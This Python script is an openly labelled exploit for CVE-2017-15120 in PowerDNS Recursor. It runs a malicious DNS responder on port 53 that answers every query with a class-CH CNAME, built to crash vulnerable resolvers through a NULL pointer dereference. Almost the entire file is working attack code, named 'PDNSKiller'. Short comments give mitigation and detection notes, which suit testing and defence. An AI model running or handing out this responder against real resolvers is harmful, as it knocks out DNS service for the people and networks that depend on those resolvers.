#!/usr/local/bin/python3.6
#CVE-2017-15120 exploit.
#DO NOT ABUSE !!!
#
# Reproducer for CVE-2017-15120 (PowerDNS Recursor: NULL pointer dereference
# while parsing an answer that carries a CNAME whose class is not IN).
# The script is a minimal UDP DNS responder: every query it receives is
# answered with one CNAME record whose class is set to CH.
#
# Defender notes:
#   * Mitigation: run a Recursor release that the vendor advisory for this
#     CVE lists as fixed; a fixed resolver should survive this answer.
#   * Detection: the only unusual element on the wire is an answer-section
#     CNAME with CLASS=3 (CH) rather than CLASS=1 (IN). Such answers are not
#     expected in ordinary resolution and can be flagged on the resolver's
#     upstream traffic, together with unexpected resolver restarts.
import socket

#pip install dnslib
from dnslib import RR, DNSHeader, DNSRecord, QTYPE, CNAME, CLASS


class PDNSKiller:
    """UDP DNS responder that answers every query with a class-CH CNAME."""

    def __init__(self, ipaddr):
        """Remember the listen address; the port is fixed to 53."""
        self.host = ipaddr
        self.port = 53

    def run(self):
        """Bind the UDP socket and answer datagrams forever.

        Each datagram is handed to craftPayload(); a reply is sent back to
        the sender only when craftPayload() returns something other than
        None. The loop has no exit condition and the socket is never closed.
        """
        listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        listener.bind((self.host, self.port))
        print("PDNS Killer Started.")
        while True:
            # Read at most 8096 bytes per datagram.
            packet, peer = listener.recvfrom(8096)
            peer_host, peer_port = peer
            print(f"Received DNS Packet. Client:{peer_host}:{peer_port}")
            answer = self.craftPayload(packet)
            if answer is None:
                continue
            listener.sendto(answer, (peer_host, peer_port))

    def craftPayload(self, msg):
        """Build the packed reply for the raw query *msg*.

        The reply echoes the query (via DNSRecord.reply()) and carries one
        answer: a CNAME for the queried name pointing at "example.com." with
        TTL 60 and its class overwritten to CH. Returns the packed bytes, or
        None when the reply object is not a DNSRecord.
        """
        parsed = DNSRecord.parse(msg)
        reply = parsed.reply()
        owner = self.getQname(parsed)
        record = RR(owner, QTYPE.CNAME, ttl=60, rdata=CNAME("example.com."))
        #vuln point.
        # The class is switched from the default to CH after construction;
        # this non-IN CNAME is the field a vulnerable parser mishandles.
        record.rclass = CLASS.CH
        reply.add_answer(record)

        # NOTE(review): reply() presumably always yields a DNSRecord, so this
        # branch looks unreachable - confirm against dnslib.
        if reply.__class__.__name__ != "DNSRecord":
            return None

        rule = "==============================="
        print(rule)
        print(reply)
        print(rule)
        return reply.pack()

    def getQname(self, query):
        """Return the name asked for in the query's question, as a string."""
        question = query.q
        return str(question.qname)


if __name__ == '__main__':
    # "0.0.0.0" makes the listener reachable on every interface of the host.
    PDNSKiller("0.0.0.0").run()